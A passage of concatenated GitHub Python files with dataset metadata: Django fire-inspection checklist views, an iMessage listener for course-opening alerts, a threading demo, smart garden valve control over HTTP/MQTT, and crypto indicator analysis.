''),\n 'building': request.POST.get('building', ''),\n 'business': request.POST.get('business', ''),\n 'notes': request.POST.get('notes', ''),\n 'recommendations': request.POST.get('recommendations', ''),\n }\n\n if form.is_valid():\n first_name = form.cleaned_data['first_name']\n middle_name = form.cleaned_data['middle_name']\n last_name = form.cleaned_data['last_name']\n policy_no = form.cleaned_data['policy_no']\n building_permit = form.cleaned_data['building_permit']\n occupancy_permit = form.cleaned_data['occupancy_permit']\n fsic_control_no = form.cleaned_data['fsic_control_no']\n fsic_fee = form.cleaned_data['fsic_fee']\n fire_drill_certificate = form.cleaned_data['fire_drill_certificate']\n violation_control_no = form.cleaned_data['violation_control_no']\n electrical_inspection_no = form.cleaned_data['electrical_inspection_no']\n sectional_occupancy = form.cleaned_data['sectional_occupancy']\n exits_count = 
form.cleaned_data['exits_count']\n exits_width = form.cleaned_data['exits_width']\n exits_accessible = form.cleaned_data['exits_accessible']\n termination_of_exit = form.cleaned_data['termination_of_exit']\n exits_enclosure_provided = form.cleaned_data['exits_enclosure_provided']\n exits_enclosure_construction = form.cleaned_data['exits_enclosure_construction']\n exits_fire_doors_provided = form.cleaned_data['exits_fire_doors_provided']\n exits_fire_door_construction = form.cleaned_data['exits_fire_door_construction']\n stairs_count = form.cleaned_data['stairs_count']\n stairs_enclosure_provided = form.cleaned_data['stairs_enclosure_provided']\n stairs_enclosure_construction = form.cleaned_data['stairs_enclosure_construction']\n stairs_fire_doors_provided = form.cleaned_data['stairs_fire_doors_provided']\n stairs_fire_door_construction = form.cleaned_data['stairs_fire_door_construction']\n other_details = form.cleaned_data['other_details']\n emergency_light = form.cleaned_data['emergency_light']\n exit_signs_illuminated = form.cleaned_data['exit_signs_illuminated']\n fire_extinguisher_count = form.cleaned_data['fire_extinguisher_count']\n fire_extinguisher_accessible = form.cleaned_data['fire_extinguisher_accessible']\n fire_extinguisher_conspicuous_location = form.cleaned_data['fire_extinguisher_conspicuous_location']\n fire_alarm = form.cleaned_data['fire_alarm']\n detectors = form.cleaned_data['detectors']\n control_panel_location = form.cleaned_data['control_panel_location']\n control_panel_functional = form.cleaned_data['control_panel_functional']\n hazardous_materials = form.cleaned_data['hazardous_materials']\n hazardous_materials_properly_stored = form.cleaned_data['hazardous_materials_properly_stored']\n no_smoking_sign = form.cleaned_data['no_smoking_sign']\n smoking_permitted = form.cleaned_data['smoking_permitted']\n smoking_area_location = form.cleaned_data['smoking_area_location']\n storage_location = form.cleaned_data['storage_location']\n safety_device_for_lpg = form.cleaned_data['safety_device_for_lpg']\n oven_used = form.cleaned_data['oven_used']\n kind_of_fuel = form.cleaned_data['kind_of_fuel']\n smoke_hood = form.cleaned_data['smoke_hood']\n spark_arrester = form.cleaned_data['spark_arrester']\n partition_construction = form.cleaned_data['partition_construction']\n defects = form.cleaned_data['defects']\n building_permit_date_issued = form.cleaned_data['building_permit_date_issued']\n occupancy_permit_date_issued = form.cleaned_data['occupancy_permit_date_issued']\n fsic_date_issued = form.cleaned_data['fsic_date_issued']\n fire_drill_certificate_date_issued = form.cleaned_data['fire_drill_certificate_date_issued']\n violation_control_no_date_issued = form.cleaned_data['violation_control_no_date_issued']\n electrical_inspection_date_issued = form.cleaned_data['electrical_inspection_date_issued']\n insurance_date_issued = form.cleaned_data['insurance_date_issued']\n date_checked = form.cleaned_data['date_checked']\n building = form.cleaned_data['building']\n business = form.cleaned_data['business']\n notes = form.cleaned_data['notes']\n recommendations = form.cleaned_data['recommendations']\n\n checklist, checklist_message = Master.objects.create(\n first_name=first_name,\n middle_name=middle_name,\n last_name=last_name,\n policy_no=policy_no,\n building_permit=building_permit,\n occupancy_permit=occupancy_permit,\n fsic_control_no=fsic_control_no,\n fsic_fee=fsic_fee,\n fire_drill_certificate=fire_drill_certificate,\n violation_control_no=violation_control_no,\n 
electrical_inspection_no=electrical_inspection_no,\n sectional_occupancy=sectional_occupancy,\n exits_count=exits_count,\n exits_width=exits_width,\n exits_accessible=exits_accessible,\n termination_of_exit=termination_of_exit,\n exits_enclosure_provided=exits_enclosure_provided,\n exits_enclosure_construction=exits_enclosure_construction,\n exits_fire_doors_provided=exits_fire_doors_provided,\n exits_fire_door_construction=exits_fire_door_construction,\n stairs_count=stairs_count,\n stairs_enclosure_provided=stairs_enclosure_provided,\n stairs_enclosure_construction=stairs_enclosure_construction,\n stairs_fire_doors_provided=stairs_fire_doors_provided,\n stairs_fire_door_construction=stairs_fire_door_construction,\n other_details=other_details,\n emergency_light=emergency_light,\n exit_signs_illuminated=exit_signs_illuminated,\n fire_extinguisher_count=fire_extinguisher_count,\n fire_extinguisher_accessible=fire_extinguisher_accessible,\n fire_extinguisher_conspicuous_location=fire_extinguisher_conspicuous_location,\n fire_alarm=fire_alarm,\n detectors=detectors,\n control_panel_location=control_panel_location,\n control_panel_functional=control_panel_functional,\n hazardous_materials=hazardous_materials,\n hazardous_materials_properly_stored=hazardous_materials_properly_stored,\n no_smoking_sign=no_smoking_sign,\n smoking_permitted=smoking_permitted,\n smoking_area_location=smoking_area_location,\n storage_location=storage_location,\n safety_device_for_lpg=safety_device_for_lpg,\n oven_used=oven_used,\n kind_of_fuel=kind_of_fuel,\n smoke_hood=smoke_hood,\n spark_arrester=spark_arrester,\n partition_construction=partition_construction,\n defects=defects,\n building_permit_date_issued=building_permit_date_issued,\n occupancy_permit_date_issued=occupancy_permit_date_issued,\n fsic_date_issued=fsic_date_issued,\n fire_drill_certificate_date_issued=fire_drill_certificate_date_issued,\n violation_control_no_date_issued=violation_control_no_date_issued,\n electrical_inspection_date_issued=electrical_inspection_date_issued,\n insurance_date_issued=insurance_date_issued,\n date_checked=date_checked,\n building=building,\n business=business,\n notes=notes,\n recommendations=recommendations,\n )\n\n if checklist:\n result = checklist.result()\n if result:\n checklist.status = APPROVED\n checklist.remarks = APPROVED\n\n checklist.business.status = APPROVED\n checklist.building.status = APPROVED\n\n checklist.business.save()\n checklist.building.save()\n\n checklist.business.is_safe(checklist_pk=checklist.pk)\n\n else:\n checklist.remarks = REINSPECT\n checklist.status = FAILED\n\n checklist.business.status = FAILED\n checklist.building.status = FAILED\n\n checklist.business.save()\n checklist.building.save()\n\n checklist.inspection = inspection_schedule\n checklist.save()\n\n if inspection_schedule.inspection_type == REINSPECT:\n if checklist.remarks == REINSPECT:\n checklist.status = FAILED\n checklist.remarks = REINSPECT\n checklist.save()\n\n inspection_schedule.status = DONE\n inspection_schedule.save()\n\n messages.success(request, 'Checklist recorded!', extra_tags='success')\n return HttpResponseRedirect(\n reverse('inspector_dashboard_checklist_detail', kwargs={'pk': checklist.pk}))\n else:\n messages.error(request, checklist_message, extra_tags='danger')\n else:\n messages.error(request, form.errors, extra_tags='danger')\n request.session['checklist_formdata'] = checklist_formdata\n\n return HttpResponseRedirect(reverse('inspector_dashboard_checklist_create', kwargs={'pk': pk}))\n\n\nclass 
InspectorDashboardChecklistDetailView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Detail view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n\n context = {\n \"page_title\": f\"Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"detail\",\n \"obj\": obj,\n }\n\n return render(request, \"inspector_dashboard/checklist/detail.html\", context)\n\n\nclass InspectorDashboardChecklistUpdateView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Update view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n form = MasterForm(instance=obj)\n\n context = {\n \"page_title\": f\"Update Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"update\",\n \"obj\": obj,\n \"form\": form\n }\n\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n def post(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n form = MasterForm(instance=obj, data=request.POST)\n\n if form.is_valid():\n data = form.save()\n messages.success(\n request,\n f'{data} saved!',\n extra_tags='success'\n )\n\n return HttpResponseRedirect(\n reverse(\n 'inspector_dashboard_checklist_detail',\n kwargs={\n 'pk': data.pk\n }\n )\n )\n else:\n context = {\n \"page_title\": f\"Update Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"update\",\n \"obj\": obj,\n \"form\": form\n }\n\n messages.error(\n request,\n 'There were errors processing your request:',\n extra_tags='danger'\n )\n return render(request, \"inspector_dashboard/checklist/form.html\", context)\n\n\nclass InspectorDashboardChecklistDeleteView(LoginRequiredMixin, IsUserViewMixin, View):\n \"\"\"\n Delete view for Checklist.\n\n Allowed HTTP verbs:\n - GET\n - POST\n\n Restrictions:\n - LoginRequired\n - Admin user\n\n Filters:\n - pk = kwargs.get('pk')\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n context = {\n \"page_title\": f\"Delete Checklist: {obj}\",\n \"menu_section\": \"user_dashboards\",\n \"menu_subsection\": \"user_dashboards\",\n \"menu_action\": \"delete\",\n \"obj\": obj\n }\n\n return render(request, \"inspector_dashboard/checklist/delete.html\", context)\n\n def post(self, request, *args, **kwargs):\n obj = get_object_or_404(Master, pk=kwargs.get('pk', None))\n\n messages.success(\n request,\n f'{obj} deleted!',\n extra_tags='success'\n )\n\n obj.delete()\n\n return HttpResponseRedirect(\n reverse(\n 'inspector_dashboard_checklist_list'\n )\n )\n","repo_name":"nujkram/rcbfp-backend-web","sub_path":"inspector_dashboards/controllers/views/inspector_dashboards/checklist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1012084292","text":"import re\nfrom datetime import datetime, timedelta\nfrom imessage_reader.fetch_data import FetchData\n\nfrom 
listeners.listener import Listener\n\n\nTARGET_SENDER = \"22733\"  # Notify.UW phone number\n\nSLN_REGEX = \"SLN: ([0-9]{5})\"\nTIME_REGEX = \"(20[0-9]{2}-[0,1][0-9]-[0-3][0-9]) ([0-2][0-9]:[0-5][0-9]:[0-5][0-9])\"\n\n\n# Returns true iff the message is from Notify.UW and is less than 30 seconds old\ndef extract(message):\n    if TARGET_SENDER in message:\n        regex_result = re.search(TIME_REGEX, str(message))\n\n        if regex_result is not None:\n            date = [int(i) for i in regex_result.group(1).split(\"-\")]\n            time = [int(i) for i in regex_result.group(2).split(\":\")]\n\n            timestamp = datetime(date[0], date[1], date[2], time[0], time[1], time[2])\n\n            if timestamp >= datetime.now() - timedelta(seconds=30):\n                return True\n\n    return False\n\n\nclass iMessageListener(Listener):\n\n    # Initialize object and iMessage reader\n    def __init__(self, automator):\n        super().__init__(\"iMessage Listener\", automator)\n\n        self.previous_message = None\n        self.iMessage = FetchData()\n\n        print(\"iMessage Listener: Initialized\")\n\n    # Scans inbox for unread Notify.UW messages\n    def listener_task(self):\n        # Extracts all Notify.UW messages that are less than 30 seconds old\n        messages = list(filter(extract, self.iMessage.get_messages()))\n\n        if len(messages) > 0:\n            # Get index of oldest unread message\n            try:\n                index = messages.index(self.previous_message) + 1\n            except ValueError:\n                index = 0\n\n            # Iterate through all unread messages\n            while index < len(messages):\n                message = messages[index]\n\n                regex_result = re.search(SLN_REGEX, str(message))\n\n                if regex_result is not None:\n                    sln_code = regex_result.group(1)\n\n                    print(f\"iMessage Listener: Course with SLN: {sln_code} has just opened up\")\n\n                    try:\n                        self.automator.register(sln_code)\n                    except Exception:\n                        print(f\"iMessage Listener: Could not register for SLN: {sln_code} \"\n                              \"since another listener is currently controlling Safari\")\n\n                index += 1\n\n            self.previous_message = messages[-1]\n\n        else:\n            self.previous_message = None\n","repo_name":"jamessrichie/course-hunter","sub_path":"listeners/imessage_listener.py","file_name":"imessage_listener.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73676377449","text":"# Producer/consumer pattern implemented with threading.Condition\nimport threading,random,time\n\ngCondition = threading.Condition()\ngMoney = 1000\ngTime = 0\ngTotalTime = 10\n\nclass Producer(threading.Thread):\n    def run(self):\n        global gMoney\n        global gTime\n        while True:\n            money = random.randint(100,1000)\n            gCondition.acquire()\n            gTime +=1\n            if gTime >=gTotalTime:\n                gCondition.release()\n                break\n            gMoney = gMoney + money\n            # Wake up all waiting threads\n            gCondition.notify_all()\n            print('Producer %s produced %d, the vault now holds %d' %(threading.current_thread(),money,gMoney))\n            gCondition.release()\n            time.sleep(0.5)\n\nclass Consumer(threading.Thread):\n    def run(self):\n        global gMoney\n        while True:\n            money = random.randint(100,1000)\n            gCondition.acquire()\n            # Re-check after waking up: threads queued ahead of this one may have\n            # spent the money, leaving the balance insufficient again\n            while gMoney < money:\n                if gTime >=gTotalTime:\n                    gCondition.release()\n                    return\n                print('Consumer %s wants to spend %d, but the balance is insufficient' %(threading.current_thread(),money))\n                # Put the thread to sleep and release the lock\n                gCondition.wait()\n            gMoney = gMoney - money\n            print(\"Consumer %s spent %d, %d remaining\" %(threading.current_thread(),money,gMoney))\n            gCondition.release()\n            time.sleep(1)\n\ndef main():\n    for x in range(5):\n        t = Producer()\n        t.start()\n    \n    for x in range(5):\n        t = Consumer()\n        t.start()\n\nif __name__ == \"__main__\":\n    
main()\n\n","repo_name":"wangquan1024/webSpider","sub_path":"thread/demo5.py","file_name":"demo5.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19915279127","text":"import requests\nimport readJSON\nimport state\nimport config\nimport MQTTFunctions\nimport time\n\ndef sendCommandToWireless(myIP, myCommand):\n myURL = 'http://'+str(myIP)+'/'+myCommand\n \n try:\n if (config.SWDEBUG):\n print(\"myURL=\", myURL)\n req = requests.get(myURL,timeout=5)\n \n returnJSON = req.json()\n\n except Exception:\n #traceback.print_exc()\n return {} \n return returnJSON \n\n\ndef turnOnTimedValve(singleValve):\n\n\n if (len(str(singleValve[\"id\"]).replace(\" \", \"\")) > 1):\n # wireless ID\n \n wirelessJSON = readJSON.getJSONValue(\"WirelessDeviceJSON\")\n '''\n for singlewireless in wirelessJSON:\n if (str(singleValve[\"id\"]).replace(\" \",\"\") == str(singlewireless[\"id\"]).replace(\" \",\"\")):\n myIP = singlewireless[\"ipaddress\"]\n\n myCommand = \"setSingleValve?params=admin,\"+str(singleValve[\"ValveNumber\"])+\",1,\"+str(singleValve[\"OnTimeInSeconds\"])\n sendCommandToWireless(myIP, myCommand)\n '''\n MQTTFunctions.sendMQTTValve(str(singleValve[\"id\"]), str(singleValve[\"ValveNumber\"]), 1, str(singleValve[\"OnTimeInSeconds\"]))\n #\n # DEBUG slow down by 1 second\n #\n time.sleep(1)\n\ndef turnOffAllValves():\n\n wirelessJSON = readJSON.getJSONValue(\"WirelessDeviceJSON\")\n for singlewireless in wirelessJSON:\n #adminpassword, valve0state, valve0length, valve1state, valve1state, .......\n myIP = singlewireless[\"ipaddress\"]\n\n myCommand = \"setValves?params=admin,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\"\n result = sendCommandToWireless(myIP, myCommand)\n if (config.SWDEBUG):\n print(\"return=\", result)\n\n \n\n","repo_name":"switchdoclabs/SDL_Pi_SmartGardenSystem2","sub_path":"AccessValves.py","file_name":"AccessValves.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"21757514870","text":"import time\nimport warnings\nfrom os import path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport talib\nfrom binance.client import Client\nfrom binance.client import Client as BinanceClient\n\nfrom library import binance_obj, get_binance_interval_unit, AssetTicker, get_pickled, \\\n exclude_markets, find_first_maximum, save_to_file, get_klines, lowest_ask, get_time, key_dir, \\\n find_local_maximum, find_minimum_2, find_first_minimum, \\\n is_second_golden_cross, is_first_golden_cross, find_first_golden_cross, drop_below_ma, \\\n is_drop_below_ma200_after_rally, is_drop_below_ma50_after_rally, is_tradeable, slope, bias, check_wedge, \\\n is_falling_wedge, is_higher_low, get_binance_klines, get_kucoin_klines, get_kucoin_interval_unit, is_bull_flag, \\\n find_maximum_2, bull_cross, is_bull_cross_in_bull_mode, bear_cross, index_of_max_mas_difference, is_tilting, \\\n compute_wider_interval, get_setup_entry\n\nwarnings.filterwarnings('error')\n\n\ndef relative_strength_index(_closes, n=14):\n _prices = np.array(_closes, dtype=np.float32)\n\n _deltas = np.diff(_prices)\n _seed = _deltas[:n + 1]\n _up = _seed[_seed >= 0].sum() / n\n _down = -_seed[_seed < 0].sum() / n\n _rs = _up / _down\n _rsi = np.zeros_like(_prices)\n _rsi[:n] = 100. - 100. / (1. 
+ _rs)\n\n for _i in range(n, len(_prices)):\n _delta = _deltas[_i - 1] # cause the diff is 1 shorter\n\n if _delta > 0:\n _upval = _delta\n _downval = 0.\n else:\n _upval = 0.\n _downval = -_delta\n\n _up = (_up * (n - 1) + _upval) / n\n _down = (_down * (n - 1) + _downval) / n\n\n _rs = _up / _down\n _rsi[_i] = 100. - 100. / (1. + _rs)\n\n return _rsi\n\n\ndef get_rsi(_market, _ticker, _time_interval):\n for _i in range(0, 10):\n try:\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n return talib.RSI(_closes, timeperiod=14)\n except Warning:\n time.sleep(1)\n\n\nplt.figure(1)\n\n\n### prices\n\n# plt.subplot2grid((8, 1), (0, 0), rowspan = 4)\n# plt.plot(_closes[-wins:], 'k', lw = 1)\n\n# plt.subplot2grid((2, 1), (0, 0))\n# plt.plot(r[-wins:], color='black', lw=1)\n# plt.axhline(y=30, color='red', linestyle='-')\n# plt.axhline(y=70, color='blue', linestyle='-')\n\n\ndef get_magnitude(_reversed_max_ind, _max_val):\n try:\n return int(np.log10(_reversed_max_ind / np.abs(_max_val)))\n except Warning:\n return -1\n\n\ndef get_angle(p1, p2):\n return np.arctan((p2[1] - p1[1]) / (p2[0] - p1[0])) * 180 / np.pi\n\n\ndef is_signal_divergence_ratio(_macd, _macdsignal, _ratio, _start, _stop):\n _diff = _macd - _macdsignal\n _diff_max_val, _diff_reversed_max_ind = find_first_maximum(_diff[_start:_stop:1], 10)\n _diff_max_val2, _diff_reversed_max_ind2 = find_first_maximum(-_diff[_start:_stop:1], 10)\n if _diff_max_val2 > _diff_max_val:\n _diff_max_val = _diff_max_val2\n return np.abs((_diff[_stop] + _diff[_stop - 1]) / 2) / _diff_max_val <= _ratio\n\n\ndef is_rsi_slope_condition(_rsi, _rsi_limit, _angle_limit, _start, _stop, _window=10):\n if (_rsi[_stop] + _rsi[_stop - 1]) / 2 > _rsi_limit:\n return False\n _rsi_max_val, _rsi_reversed_max_ind = find_first_maximum(_rsi[_start:_stop:1], _window)\n _rsi_magnitude = get_magnitude(_rsi_reversed_max_ind, _rsi_max_val)\n if _rsi_magnitude == -1:\n return False\n _rsi_angle = get_angle((0, _rsi[_start:_stop:1][-1]),\n (_rsi_reversed_max_ind / np.power(10, _rsi_magnitude), _rsi_max_val))\n return _rsi_angle >= _angle_limit\n\n\ndef is_macd_condition(_macd, _angle_limit, _start, _stop, _window=10):\n _macd_max_val, _macd_reversed_max_ind = find_first_maximum(_macd[_start:_stop:1], _window)\n _macd_max_val2, _macd_reversed_max_ind2 = find_first_maximum(-_macd[_start:_stop:1], _window)\n if _macd_reversed_max_ind2 < _macd_reversed_max_ind:\n _current_macd = (_macd[_stop] + _macd[_stop - 1]) / 2\n _local_min_ratio = (_macd_max_val2 - np.abs(_current_macd)) / _macd_max_val2\n if _local_min_ratio > 0.2:\n # we have a minimum at first\n return False\n if _macd_reversed_max_ind == -1:\n return False\n _macd_magnitude = get_magnitude(_macd_reversed_max_ind, _macd_max_val)\n _macd_angle = get_angle((0, _macd[_start:_stop:1][-1]),\n (_macd_reversed_max_ind / np.power(10, _macd_magnitude), _macd_max_val))\n return _macd_angle >= _angle_limit\n\n\ndef get_closes(_klines):\n return np.array(list(map(lambda _x: float(_x[4]), _klines)))\n\n\ndef get_opens(_klines):\n return np.array(list(map(lambda _x: float(_x[1]), _klines)))\n\n\ndef get_tradeable_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _tradeable_assets = []\n for _market in _markets:\n _asset = _market.split(\"BTC\")[0]\n try:\n if _asset:\n # print(_asset)\n _closes = get_closes(get_klines(_market, _ticker, _time_interval))\n # _rsi = relative_strength_index(_closes)\n _rsi = get_rsi(_market, _ticker, _time_interval)\n _macd, 
_macdsignal, _macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n if is_tradeable(_closes, _rsi, _macd, _macdsignal):\n _tradeable_assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception:\n print('Value Error for {} in {}'.format(_ticker, _market))\n sort_assets(_tradeable_assets)\n return _tradeable_assets\n\n\ndef get_tradeable_and_bullish_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _assets = []\n for _market in _markets:\n _asset = _market.split(\"BTC\")[0]\n try:\n if _asset:\n # print(_asset)\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n _opens = get_opens(_klines)\n _ma100 = talib.MA(_closes, timeperiod=100)\n _ma50 = talib.MA(_closes, timeperiod=50)\n _ma20 = talib.MA(_closes, timeperiod=20)\n _ma7 = talib.MA(_closes, timeperiod=7)\n\n _cond1 = bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7) \\\n or bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_1(_opens,\n _closes,\n _ma100, _ma50,\n _ma20,\n _ma7) \\\n or bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_3(_opens, _closes,\n _ma100, _ma50,\n _ma20, _ma7)\n _rsi = get_rsi(_market, _ticker, _time_interval)\n _macd, _macdsignal, _macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n _cond2 = is_tradeable(_closes, _rsi, _macd, _macdsignal)\n\n if _cond1 and _cond2:\n _assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception as err:\n print('Exception for {} in {}'.format(_ticker, _market))\n # traceback.print_tb(err.__traceback__)\n sort_assets(_assets)\n return _assets\n\n\ndef get_bullish_assets(_markets, _ticker):\n _time_interval = get_binance_interval_unit(_ticker)\n _bullish_assets = []\n for _market in _markets:\n try:\n _asset = _market.split(\"BTC\")[0]\n if _asset:\n # print(_asset)\n _klines = get_klines(_market, _ticker, _time_interval)\n _closes = get_closes(_klines)\n _opens = get_opens(_klines)\n _ma100 = talib.MA(_closes, timeperiod=100)\n _ma50 = talib.MA(_closes, timeperiod=50)\n _ma20 = talib.MA(_closes, timeperiod=20)\n _ma7 = talib.MA(_closes, timeperiod=7)\n\n _cond1 = bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7) \\\n or bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_1(_opens,\n _closes,\n _ma100, _ma50,\n _ma20,\n _ma7) \\\n or bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7) or bullishness_3(_opens, _closes,\n _ma100, _ma50,\n _ma20, _ma7)\n\n if _cond1:\n _bullish_assets.append(AssetTicker(_asset, _ticker, lowest_ask(_market), time.time()))\n except Exception:\n print('Exception for {} in {}'.format(_ticker, _market))\n sort_assets(_bullish_assets)\n return _bullish_assets\n\n\ndef sort_assets(_assets):\n _assets.sort(key=lambda a: a.name)\n\n\ndef get_avg_last(_values, _stop, _window=1):\n return np.mean(_values[_stop - _window:])\n\n\ndef get_std_last(_values, _stop, _window=1):\n return np.std(_values[_stop - _window:])\n\n\ndef get_last(_values, _stop, _window=1):\n return _values[_stop - _window + 1:]\n\n\ndef get_avg_last_2(_values, _stop, _window=2):\n return np.mean(_values[_stop - _window + 1:_stop])\n\n\ndef get_last_2(_values, _stop, _window=2):\n return _values[_stop - _window + 1:_stop]\n\n\ndef bullishness_00(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = 
get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_20\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff < 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! <0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_01(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_20\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! <0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_1(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma_20 = get_avg_last(_ma20, _stop)\n _curr_ma_7 = get_avg_last(_ma7, _stop)\n _curr_ma = _curr_ma_7\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma\n _opening_diff = _curr_ma - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma < 0.05 # up to 5 percent in difference we trust! 
<0 is good for bouncing detector\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma_7 < _curr_ma_20 > _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_2(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma20 = get_avg_last(_ma20, _stop)\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_open = get_avg_last(_opens, _stop)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma20\n _opening_diff = _curr_ma20 - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma20 < 0.05 # up to 5 percent in difference we trust!\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n return _curr_ma20 < _curr_ma50 > _curr_ma100 and _cond_1 and _cond_2\n\n\ndef bullishness_3(_opens, _closes, _ma100, _ma50, _ma20, _ma7, _stop=-1):\n _curr_ma100 = get_avg_last(_ma100, _stop)\n _curr_ma50 = get_avg_last(_ma50, _stop)\n _curr_ma20 = get_avg_last(_ma20, _stop)\n _curr_ma7 = get_avg_last(_ma7, _stop)\n _mean_open = get_avg_last(_opens, _stop, 10)\n _curr_open = get_avg_last(_opens, _stop)\n _curr_close = get_avg_last(_closes, _stop)\n _closing_diff = _curr_close - _curr_ma7\n _opening_diff = _curr_ma7 - _mean_open\n _cond_1 = _closing_diff > 0 and _closing_diff / _curr_ma7 < 0.05 # up to 5 percent in difference we trust!\n _cond_2 = _opening_diff > 0 and _opening_diff / _mean_open < 0.05 # up to 5 percent in difference we trust!\n _cond_3 = _curr_ma7 < _curr_ma20 < _curr_ma50\n\n return _cond_1 and _cond_2 and _cond_3\n\n\ndef aggregate_assets(_map, _assets, _ticker):\n for _asset in _assets:\n if _asset.name in _map:\n _map[_asset.name].add_ticker(_ticker)\n else:\n _map[_asset.name] = _asset\n\n\ndef post_proc(_map):\n _list = list(map(lambda x: x[1], _map.items()))\n _list.sort(key=lambda a: len(a.tickers))\n _list.reverse()\n return _list\n\n\ndef print_assets(_assets):\n for _a in _assets:\n print(_a.name + \" : \" + ' '.join(_a.tickers) + \" ask price : \" + \"{:.8f} time : {}\".format(_a.ask_price,\n get_time(\n _a.timestamp)))\n\n\ndef analyze_markets():\n markets = binance_obj.get_all_btc_currencies(exclude_markets)\n\n # tickers = [Client.KLINE_INTERVAL_3MINUTE, Client.KLINE_INTERVAL_5MINUTE,\n # Client.KLINE_INTERVAL_15MINUTE, Client.KLINE_INTERVAL_30MINUTE, Client.KLINE_INTERVAL_1HOUR,\n # 